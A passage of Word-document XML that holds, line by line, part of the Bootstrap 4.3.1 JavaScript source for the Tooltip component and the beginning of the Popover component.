        <w:t xml:space="preserve">      var triggers = this.config.trigger.split(' ');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      triggers.forEach(function (trigger) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        if (trigger === 'click') {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          $(_this4.element).on(_this4.constructor.Event.CLICK, _this4.config.selector, function (event) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            return _this4.toggle(event);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          });</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        } else if (trigger !== Trigger.MANUAL) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          var eventIn = trigger === Trigger.HOVER ? _this4.constructor.Event.MOUSEENTER : _this4.constructor.Event.FOCUSIN;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          var eventOut = trigger === Trigger.HOVER ? _this4.constructor.Event.MOUSELEAVE : _this4.constructor.Event.FOCUSOUT;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          $(_this4.element).on(eventIn, _this4.config.selector, function (event) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">            return _this4._enter(event);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          }).on(eventOut, _this4.config.selector, function (event) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">            return _this4._leave(event);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          });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$(this.element).closest('.modal').on('hide.bs.modal', function () {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        if (_this4.element) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          _this4.hide();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/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      if (this.config.selector) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        this.config = _objectSpread({}, this.config, {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          trigger: 'manual',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          selector: ''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lastRenderedPageBreak/>
        <w:t xml:space="preserve">        this._fixTitle();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_proto._fixTitle = function _fixTitle() {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      var titleType = typeof this.element.getAttribute('data-original-title');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      if (this.element.getAttribute('title') || titleType !== 'string') {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        this.element.setAttribute('data-original-title', this.element.getAttribute('title') || '');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        this.element.setAttribute('title', '');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_proto._enter = function _enter(event, context) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      var dataKey = this.constructor.DATA_KEY;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      context = context || $(event.currentTarget).data(dataKey);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      if (!context) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        context = new this.constructor(event.currentTarget, this._getDelegateConfig());</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        $(event.currentTarget).data(dataKey, context);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(event) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        context._activeTrigger[event.type === 'focusin' ? Trigger.FOCUS : Trigger.HOVER] = true;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($(context.getTipElement()).hasClass(ClassName$6.SHOW) || context._hoverState === HoverState.SHOW) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        context._hoverState = HoverState.SHOW;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clearTimeout(context._timeout);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      context._hoverState = HoverState.SHOW;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      if (!context.config.delay || !context.config.delay.show) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        context.show();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context._timeout = setTimeout(function () {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        if (context._hoverState === HoverState.SHOW) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          context.show();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}, context.config.delay.show);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_proto._leave = function _leave(event, context) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      var dataKey = this.constructor.DATA_KEY;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      context = context || $(event.currentTarget).data(dataKey);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">      if (!context) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        context = new this.constructor(event.currentTarget, this._getDelegateConfig());</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        $(event.currentTarget).data(dataKey, context);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(event) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        context._activeTrigger[event.type === 'focusout' ? Trigger.FOCUS : Trigger.HOVER] = false;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(context._isWithActiveTrigger())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clearTimeout(context._timeout);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      context._hoverState = HoverState.OUT;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      if (!context.config.delay || !context.config.delay.hide) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        context.hide();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context._timeout = setTimeout(function () {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        if (context._hoverState === HoverState.OUT) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          context.hide();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lastRenderedPageBreak/>
        <w:t xml:space="preserve">      }, context.config.delay.hide);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_proto._isWithActiveTrigger = function _isWithActiveTrigger() {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      for (var trigger in this._activeTrigger) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        if (this._activeTrigger[trigger]) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          return true;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false;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_proto._getConfig = function _getConfig(config) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      var dataAttributes = $(this.element).data();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      Object.keys(dataAttributes).forEach(function (dataAttr) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        if (DISALLOWED_ATTRIBUTES.indexOf(dataAttr) !== -1) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          delete dataAttributes[dataAttr];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config = _objectSpread({}, this.constructor.Default, dataAttributes, typeof config === 'object' &amp;&amp; config ? config : {});</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      if (typeof config.delay === 'number') {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        config.delay = {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          show: config.delay,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">          hide: config.delay</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        };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(typeof config.title === 'number') {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        config.title = config.title.toString();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(typeof config.content === 'number') {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        config.content = config.content.toString();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Util.typeCheckConfig(NAME$6, config, this.constructor.DefaultType);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      if (config.sanitize) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        config.template = sanitizeHtml(config.template, config.whiteList, config.sanitizeFn);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_proto._getDelegateConfig = function _getDelegateConfig() {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      var config = {};</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      if (this.config) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        for (var key in this.config) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          if (this.constructor.Default[key] !== this.config[key]) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">            config[key] = this.config[key];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_proto._cleanTipClass = function _cleanTipClass() {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      var $tip = $(this.getTipElement());</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      var tabClass = $tip.attr('class').match(BSCLS_PREFIX_REGEX);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      if (tabClass !== null &amp;&amp; tabClass.length) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        $tip.removeClass(tabClass.join(''));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_proto._handlePopperPlacementChange = function _handlePopperPlacementChange(popperData) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      var popperInstance = popperData.instance;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      this.tip = popperInstance.popper;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      this._cleanTipClass();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">      this.addAttachmentClass(this._getAttachment(popperData.placement));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_proto._fixTransition = function _fixTransition() {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      var tip = this.getTipElement();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      var initConfigAnimation = this.config.animation;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      if (tip.getAttribute('x-placement') !== null)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$(tip).removeClass(ClassName$6.FADE);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      this.config.animation = false;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      this.hide();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      this.show();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      this.config.animation = initConfigAnimation;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Tooltip._jQueryInterface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$(this).data(DATA_KEY$6);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        var _config = typeof config === 'object' &amp;&amp; config;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        if (!data &amp;&amp; /dispose|hide/.test(config)) {</w:t>
      </w:r>
    </w:p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Tooltip(this, _config);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          $(this).data(DATA_KEY$6,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_createClass(Tooltip,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VERSION$6;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lastRenderedPageBreak/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Default$4;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"NAME",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NAME$6;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"DATA_KEY",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DATA_KEY$6;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"Event",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Event$6;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"EVENT_KEY",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EVENT_KEY$6;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lastRenderedPageBreak/>
        <w:t xml:space="preserve">      key: "DefaultType",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DefaultType$4;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Tooltip;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$.fn[NAME$6] = Tooltip._jQueryInterface;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  $.fn[NAME$6].Constructor = Tooltip;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  $.fn[NAME$6].noConflict = function () {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    $.fn[NAME$6] = JQUERY_NO_CONFLICT$6;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    return Tooltip._jQueryInterface;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lastRenderedPageBreak/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NAME$7 = 'popover';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  var VERSION$7 = '4.3.1';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  var DATA_KEY$7 = 'bs.popover';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  var EVENT_KEY$7 = "." + DATA_KEY$7;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  var JQUERY_NO_CONFLICT$7 = $.fn[NAME$7];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  var CLASS_PREFIX$1 = 'bs-popover';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  var BSCLS_PREFIX_REGEX$1 = new RegExp("(^|\\s)" + CLASS_PREFIX$1 + "\\S+", 'g');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  var Default$5 = _objectSpread({}, Tooltip.Default, {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    placement: 'right',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    trigger: 'click',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    content: '',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1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:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  });</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  var DefaultType$5 = _objectSpread({}, Tooltip.DefaultType, {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    content: '(string|element|function)'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  });</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  var ClassName$7 = {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    FADE: 'fade',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    SHOW: 'show'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Selector$7 = {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    TITLE: '.popover-header',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    CONTENT: '.popover-body'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Event$7 = {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    HIDE: "hide" + EVENT_KEY$7,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    HIDDEN: "hidden" + EVENT_KEY$7,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    SHOW: "show" + EVENT_KEY$7,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    SHOWN: "shown" + EVENT_KEY$7,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    INSERTED: "inserted" + EVENT_KEY$7,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    CLICK: "click" + EVENT_KEY$7,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    FOCUSIN: "focusin" + EVENT_KEY$7,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    FOCUSOUT: "focusout" + EVENT_KEY$7,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    MOUSEENTER: "mouseenter" + EVENT_KEY$7,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    MOUSELEAVE: "mouseleave" + EVENT_KEY$7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lastRenderedPageBreak/>
        <w:t xml:space="preserve">  var Popover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(_Tooltip) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    _inheritsLoose(Popover, _Tooltip);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    function Popover() {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      return _Tooltip.apply(this, arguments) || this;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var _proto = Popover.prototype;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    // Overrides</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    _proto.isWithContent = function isWithContent() {</w:t>
      </w:r>
    </w:p>
